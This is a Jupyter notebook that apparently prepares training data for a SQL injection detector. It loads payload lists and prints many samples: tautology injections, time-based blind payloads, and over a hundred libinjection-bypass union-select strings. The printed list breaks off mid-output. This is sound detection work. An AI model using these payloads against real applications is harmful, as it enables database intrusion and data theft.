In [3]:
import glob
import time
import pandas as pd
# from xml.dom import minidom
from nltk import ngrams
from nltk.tokenize import sent_tokenize
import nltk
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
from nltk.stem import PorterStemmer
from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords 
from nltk.tokenize import word_tokenize

[nltk_data] Downloading package punkt to
[nltk_data]     C:\Users\tanuj\AppData\Roaming\nltk_data...
[nltk_data]   Package punkt is already up-to-date!
[nltk_data] Downloading package stopwords to
[nltk_data]     C:\Users\tanuj\AppData\Roaming\nltk_data...
[nltk_data]   Package stopwords is already up-to-date!
[nltk_data] Downloading package wordnet to
[nltk_data]     C:\Users\tanuj\AppData\Roaming\nltk_data...
[nltk_data]   Package wordnet is already up-to-date!

In [4]:
conda install jupyter notebook

Collecting package metadata (current_repodata.json): ...working... done
Solving environment: ...working... done

# All requested packages already installed.


Note: you may need to restart the kernel to use updated packages.

==> WARNING: A newer version of conda exists. <==
  current version: 23.7.4
  latest version: 24.5.0

Please update conda by running

    $ conda update -n base -c defaults conda

Or to minimize the number of packages updated during conda update use

     conda install conda=24.5.0

In [5]:
pip install tensorflow

Requirement already satisfied: tensorflow in c:\users\tanuj\anaconda3\lib\site-packages\tensorflow-2.16.1-py3.11-win-amd64.egg (2.16.1)
Requirement already satisfied: tensorflow-intel==2.16.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow) (2.16.1)
Requirement already satisfied: absl-py>=1.0.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (2.1.0)
Requirement already satisfied: astunparse>=1.6.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (1.6.3)
Requirement already satisfied: flatbuffers>=23.5.26 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (23.5.26)
Requirement already satisfied: gast!=0.5.0,!=0.5.1,!=0.5.2,>=0.2.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (0.5.4)
Requirement already satisfied: google-pasta>=0.1.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (0.2.0)
Requirement already satisfied: h5py>=3.10.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (3.11.0)
Requirement already satisfied: libclang>=13.0.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (16.0.6)
Requirement already satisfied: ml-dtypes~=0.3.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (0.3.2)
Requirement already satisfied: opt-einsum>=2.3.2 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (3.3.0)
Requirement already satisfied: packaging in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (23.1)
Requirement already satisfied: protobuf!=4.21.0,!=4.21.1,!=4.21.2,!=4.21.3,!=4.21.4,!=4.21.5,<5.0.0dev,>=3.20.3 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (4.25.3)
Requirement already satisfied: requests<3,>=2.21.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (2.31.0)
Requirement already satisfied: setuptools in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (68.0.0)
Requirement already satisfied: six>=1.12.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (1.16.0)
Requirement already satisfied: termcolor>=1.1.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (2.4.0)
Requirement already satisfied: typing-extensions>=3.6.6 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (4.7.1)
Requirement already satisfied: wrapt>=1.11.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (1.14.1)
Requirement already satisfied: grpcio<2.0,>=1.24.3 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (1.62.0)
Requirement already satisfied: tensorboard<2.17,>=2.16 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (2.16.2)
Requirement already satisfied: keras>=3.0.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (3.3.3)
Requirement already satisfied: tensorflow-io-gcs-filesystem>=0.23.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (0.31.0)
Requirement already satisfied: numpy<2.0.0,>=1.23.5 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorflow-intel==2.16.1->tensorflow) (1.24.3)
Requirement already satisfied: wheel<1.0,>=0.23.0 in c:\users\tanuj\anaconda3\lib\site-packages (from astunparse>=1.6.0->tensorflow-intel==2.16.1->tensorflow) (0.38.4)
Requirement already satisfied: rich in c:\users\tanuj\anaconda3\lib\site-packages (from keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (13.7.1)
Requirement already satisfied: namex in c:\users\tanuj\anaconda3\lib\site-packages (from keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (0.0.8)
Requirement already satisfied: optree in c:\users\tanuj\anaconda3\lib\site-packages (from keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (0.11.0)
Requirement already satisfied: charset-normalizer<4,>=2 in c:\users\tanuj\anaconda3\lib\site-packages (from requests<3,>=2.21.0->tensorflow-intel==2.16.1->tensorflow) (2.0.4)
Requirement already satisfied: idna<4,>=2.5 in c:\users\tanuj\anaconda3\lib\site-packages (from requests<3,>=2.21.0->tensorflow-intel==2.16.1->tensorflow) (3.4)
Requirement already satisfied: urllib3<3,>=1.21.1 in c:\users\tanuj\anaconda3\lib\site-packages (from requests<3,>=2.21.0->tensorflow-intel==2.16.1->tensorflow) (1.26.16)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\tanuj\anaconda3\lib\site-packages (from requests<3,>=2.21.0->tensorflow-intel==2.16.1->tensorflow) (2024.6.2)
Requirement already satisfied: markdown>=2.6.8 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorboard<2.17,>=2.16->tensorflow-intel==2.16.1->tensorflow) (3.4.1)
Requirement already satisfied: tensorboard-data-server<0.8.0,>=0.7.0 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorboard<2.17,>=2.16->tensorflow-intel==2.16.1->tensorflow) (0.7.2)
Requirement already satisfied: werkzeug>=1.0.1 in c:\users\tanuj\anaconda3\lib\site-packages (from tensorboard<2.17,>=2.16->tensorflow-intel==2.16.1->tensorflow) (2.2.3)
Requirement already satisfied: MarkupSafe>=2.1.1 in c:\users\tanuj\anaconda3\lib\site-packages (from werkzeug>=1.0.1->tensorboard<2.17,>=2.16->tensorflow-intel==2.16.1->tensorflow) (2.1.1)
Requirement already satisfied: markdown-it-py>=2.2.0 in c:\users\tanuj\anaconda3\lib\site-packages (from rich->keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (2.2.0)
Requirement already satisfied: pygments<3.0.0,>=2.13.0 in c:\users\tanuj\anaconda3\lib\site-packages (from rich->keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (2.15.1)
Requirement already satisfied: mdurl~=0.1 in c:\users\tanuj\anaconda3\lib\site-packages (from markdown-it-py>=2.2.0->rich->keras>=3.0.0->tensorflow-intel==2.16.1->tensorflow) (0.1.0)
Note: you may need to restart the kernel to use updated packages.

DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\apache_beam-2.56.0-py3.11-win-amd64.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\avro_python3-1.10.2-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\contextlib2-21.6.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\cython-3.0.10-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\lvis-0.5.3-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\matplotlib-3.9.0rc2-py3.11-win-amd64.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\object_detection-0.1-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\portalocker-2.8.2-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\pycocotools-2.0.7-py3.11-win-amd64.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\pyparsing-2.4.7-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\sacrebleu-2.2.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\tensorflow-2.16.1-py3.11-win-amd64.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\tensorflow_io-0.31.0-py3.11-win-amd64.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\tf_keras-2.16.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\tf_models_official-2.16.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
DEPRECATION: Loading egg at c:\users\tanuj\anaconda3\lib\site-packages\tf_slim-1.1.0-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..

In [6]:
pip install tensorflow==1.2.0 --ignore-installed

Note: you may need to restart the kernel to use updated packages.

ERROR: Could not find a version that satisfies the requirement tensorflow==1.2.0 (from versions: 2.12.0rc0, 2.12.0rc1, 2.12.0, 2.12.1, 2.13.0rc0, 2.13.0rc1, 2.13.0rc2, 2.13.0, 2.13.1, 2.14.0rc0, 2.14.0rc1, 2.14.0, 2.14.1, 2.15.0rc0, 2.15.0rc1, 2.15.0, 2.15.1, 2.16.0rc0, 2.16.1)
ERROR: No matching distribution found for tensorflow==1.2.0

In [7]:
import tensorflow as tf
from tensorflow import keras

In [8]:
import nltk
import pandas as pd
import os

In [9]:
def clean_sqli_data(data):
    
    for i in range(len(data)):
        
        data[i]=data[i].replace('\n', '')
        data[i]=data[i].replace('%20', ' ')
        data[i]=data[i].replace('=', ' = ')
        data[i]=data[i].replace('((', ' (( ')
        data[i]=data[i].replace('))', ' )) ')
        data[i]=data[i].replace('(', ' ( ')
        data[i]=data[i].replace(')', ' ) ')
    
    return data

In [12]:
path='C:/Users/tanuj/Downloads/sqli.txt'

In [13]:
sql_lines_fuzzing=[]
f = open(path, "r")

In [14]:
 for x in f:
    sql_lines_fuzzing.append(x)

In [15]:
sql_lines_fuzzing=clean_sqli_data(sql_lines_fuzzing)

In [16]:
sql_lines_fuzzing[:15]

["'sqlvuln",
 "'+sqlvuln",
 'sqlvuln;',
 ' ( sqlvuln ) ',
 "a' or 1 = 1--",
 '"a"" or 1 = 1--"',
 ' or a  =  a',
 "a' or 'a'  =  'a",
 '1 or 1 = 1',
 "a' waitfor delay '0:0:10'--",
 "1 waitfor delay '0:0:10'--",
 'declare @q nvarchar  ( 4000 )  select @q  = ',
 '0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A',
 '0',
 '031003000270000']

In [17]:
path="C:/Users/tanuj/Downloads/camoufl4g3.txt"

In [18]:
# read data from file

sql_lines_camoufl4g3=[]
f = open(path, "r")

In [19]:
for x in f:
    sql_lines_camoufl4g3.append(x)

In [20]:
sql_lines_camoufl4g3[:15] # data before cleaning

["'-'\n",
 "' '\n",
 "'&'\n",
 "'^'\n",
 "'*'\n",
 "' or ''-'\n",
 "' or '' '\n",
 "' or ''&'\n",
 "' or ''^'\n",
 "' or ''*'\n",
 '"-"\n',
 '" "\n',
 '"&"\n',
 '"^"\n',
 '"*"\n']

In [21]:
sql_lines_camoufl4g3=clean_sqli_data(sql_lines_camoufl4g3)

In [22]:
sql_lines_camoufl4g3[:15]  # data after cleaning

["'-'",
 "' '",
 "'&'",
 "'^'",
 "'*'",
 "' or ''-'",
 "' or '' '",
 "' or ''&'",
 "' or ''^'",
 "' or ''*'",
 '"-"',
 '" "',
 '"&"',
 '"^"',
 '"*"']

In [23]:
path="C:/Users/tanuj/Downloads/libinjection-bypasses.txt"

In [24]:
# read data from file

sql_lines_bypasses=[]
f = open(path, "r")

In [25]:
for x in f:
    sql_lines_bypasses.append(x)

In [26]:
sql_lines_bypasses[:5] # before cleaning

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

In [27]:
print(len(sql_lines_bypasses))

474

In [28]:
sql_lines_bypasses=clean_sqli_data(sql_lines_bypasses)

In [29]:
sql_lines_bypasses[:5]  # data after cleaning

['& (  ) o1: select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 '& ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '& ( 1UE: select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

In [30]:
# if don't want &(*)* sign in beginning of each sentence then run next code else don't

for i in range(len(sql_lines_bypasses)):
    sentence=sql_lines_bypasses[i]
    sql_lines_bypasses[i]=sentence.split(':')[1]

In [31]:
sql_lines_bypasses[:5]

[' select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

In [32]:
path="C:/Users/tanuj/Downloads/Generic-SQLi.txt"

In [33]:
# read data from file

sql_lines_Generic=[]
f = open(path, "r")

In [34]:
for x in f:
    sql_lines_Generic.append(x)

In [35]:
sql_lines_Generic[:15] # before cleaning

[")%20or%20('x'='x\n",
 '%20or%201=1\n',
 "; execute immediate 'sel' || 'ect us' || 'er'\n",
 'benchmark(10000000,MD5(1))#\n',
 'update\n',
 '";waitfor delay \'0:0:__TIME__\'--\n',
 '1) or pg_sleep(__TIME__)--\n',
 '||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n',
 '"hi"") or (""a""=""a"\n',
 'delete\n',
 'like\n',
 '" or sleep(__TIME__)#\n',
 'pg_sleep(__TIME__)--\n',
 '*(|(objectclass=*))\n',
 'declare @q nvarchar (200) 0x730065006c00650063 ...\n']

In [36]:
print(len(sql_lines_Generic))

267

In [37]:
sql_lines_Generic=clean_sqli_data(sql_lines_Generic)

In [38]:
sql_lines_Generic[:15] # after cleaning

[" )  or  ( 'x' = 'x",
 ' or 1 = 1',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 'benchmark ( 10000000,MD5 ( 1  )  )  #',
 'update',
 '";waitfor delay \'0:0:__TIME__\'--',
 '1 )  or pg_sleep ( __TIME__ ) --',
 '|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ',
 '"hi"" )  or  ( ""a"" = ""a"',
 'delete',
 'like',
 '" or sleep ( __TIME__ ) #',
 'pg_sleep ( __TIME__ ) --',
 '* ( | ( objectclass = *  )  )  ',
 'declare @q nvarchar  ( 200 )  0x730065006c00650063 ...']

In [39]:
nltk.download('stopwords')

[nltk_data] Downloading package stopwords to
[nltk_data]     C:\Users\tanuj\AppData\Roaming\nltk_data...
[nltk_data]   Package stopwords is already up-to-date!

True

In [40]:
from nltk.corpus import stopwords

In [41]:
# function to remove stopwords

stop_words = set(stopwords.words('english')) 

def fun_remove_stop_words(posts):

    filtered=''
    
    for x in posts.split(' '):
        if x not in stop_words:
            filtered+=' '+x
    
    return filtered

In [44]:
path="C:/Users/tanuj/Downloads/"
file="plain.txt"

In [45]:
#read benign data

df = pd.read_csv(os.path.join(path,file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python')

In [46]:
df.head()

                                         benign
0                           Add plain text here
1                    “Ne te quaesiveris extra.”
2   “Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [47]:
plain_text=df['benign'].values

In [48]:
plain_text[:5]

array(['Add plain text here', '“Ne te quaesiveris extra.”',
       '“Man is his own star; and the soul that can',
       'Render an honest and a perfect man,',
       'Commands all light, all influence, all fate;'], dtype=object)

In [49]:
plain_text=plain_text[:-22] # removed last 22 records that were urls

In [50]:
len(plain_text)

3672

In [51]:
# convert from list to string

data=''
for x in plain_text:
    data+=" " + x

In [52]:
type(data)

str

In [53]:
data=fun_remove_stop_words(data)  # remove stop words
data=data.split('.')              # split sentences

In [54]:
# seperate words inside tags

for i in range(len(data)):
    data[i]=data[i].replace('<', ' <')
    data[i]=data[i].replace('>', '> ')
    data[i]=data[i].replace('=', ' = ')

In [55]:
data[:5]

['  Add plain text “Ne te quaesiveris extra',
 '” “Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 '” Epilogue Beaumont Fletcher’s Honest Man’s Fortune Cast bantling rocks, Suckle she-wolf’s teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional']

In [56]:
print("Benign records: %2i" %len(data))

Benign records: 3072

In [57]:
# read self created benign data

path="C:/Users/tanuj/Downloads/benign_for_training.txt"
benign_data=[]
f = open(path, "r")
for x in f:
    benign_data.append(x)

In [58]:
# read self created sqli data

path="C:/Users/tanuj/Downloads/sqli_for_training.txt"
sqli_data=[]
f = open(path, "r",encoding='utf-8')
for x in f:
    sqli_data.append(x)

In [59]:
len(benign_data)

440

In [60]:
benign_sentence=[]
for i in benign_data:
    sentences=i.split('.')
    
    for sentence in sentences:
        benign_sentence.append(sentence)

In [61]:
len(benign_sentence)

1115

In [62]:
print("total benign data : " ,len(benign_sentence)+len(data))

total benign data :  4187

In [63]:
len(sqli_data)

290

In [64]:
all_sqli_sentence=sql_lines_bypasses+sql_lines_camoufl4g3+sql_lines_fuzzing+sql_lines_Generic

In [65]:
len(all_sqli_sentence)

960

In [66]:
def optional_numeric_to_numeric(all_sqli_sentence):
    
    for i in range(len(all_sqli_sentence)):
        

        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1 ', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 1', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("'1 ", "'numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 1'", " numeric'")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1,', 'numeric,')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("1\ ", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("‘1", '‘numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 2 ", " numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3--', ' numeric--')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 4 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 5 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 6 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 7 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1234', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("22", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 200 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("23 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('"1', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1"', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("7659", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 37 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 45 ", ' numeric ')
    
    return all_sqli_sentence

In [67]:
all_sqli_sentence

[' select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<$ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1   or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\+<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or  1<@ = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or \\+<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\+<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or 1&@# = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or $<\\. or 1 = 1 -- 1',
 ' select * from users where id = 1 or $<\\. union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or $+<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\. or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<\\. union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<$ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or !<@ or 1 = 1 -- 1',
 ' select * from users where id = 1 or !<@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or @`\\` union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or @<@ = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 + ( \\ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 + ( \\ )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1.&&1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1. or 1 = 1 -- 1',
 ' select * from users where id = 1.&&@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 +  ( \\. )  or 1 = 1 -- 1',
 ' select * from users where id = 1 +  ( \\. )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1.  union select 1,version (  )  -- 1',
 ' select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1.  union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1. union select null,version (  )  -- 1',
 ' select * from users where id = 1 +\\. union select null,@@VERSION -- 1',
 ' select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1. <@ or 1 = 1 -- 1',
 ' select * from users where id = 1.<@. or 1 = 1 -- 1',
 ' select * from users where id = 1.<@. union select 1,version (  )  -- 1',
 ' select * from users where id = 1.*1 or 1 = 1 -- 1',
 ' select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1.<1# union select 1,version (  )  -- 1',
 ' select * from users where id = 1. <@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1. <@ union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1.*\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1.<@$ or 1 = 1 -- 1',
 ' select * from users where id = 1.<@$ union select 1,version (  )  -- 1',
 ' select * from users where id = 1.%@ or 1 = 1 -- 1',
 ' select * from users where id = 1.%@ union select 1,version (  )  -- 1',
 ' select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 +1 or 1 = 1 -- 1',
 ' select * from users where id = 1 + ( 1 )  or 1 = 1 -- 1',
 ' select * from users where id = 1 + ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 +1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 +1 union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 11<1# union select 1,version (  )  -- 1',
 ' select * from users where id = 1 +  ( \\+ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 +  ( \\+ )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1 +\\+. union select null,@@VERSION -- 1',
 ' select * from users where id = 1 -1<@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 +1<@ union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1 +1<@ union select null,version (  )  -- 1',
 ' select * from users where id = 1 + \\+%\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 + \\+%1 or 1 = 1 -- 1',
 ' select * from users where id = 1 + \\+%1 union select null,@@VERSION -- 1',
 ' select * from users where id = 1 + \\+*\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 + \\+%$ or 1 = 1 -- 1',
 ' select * from users where id = 1 + \\+*$ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 union select 1||1,version (  )  -- 1',
 ' select * from users where id = 1 union select 1||@,version (  )  -- 1',
 ' select * from users where id = 1 union select 1 1$,version (  )  -- 1',
 ' select * from users where id = 1 union select 1 $,version (  )  -- 1',
 ' select * from users where id = 1 union select 1 1a,version (  )  -- 1',
 ' select * from users where id = 1 union select 1<@$,version (  )  -- 1',
 ' select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1',
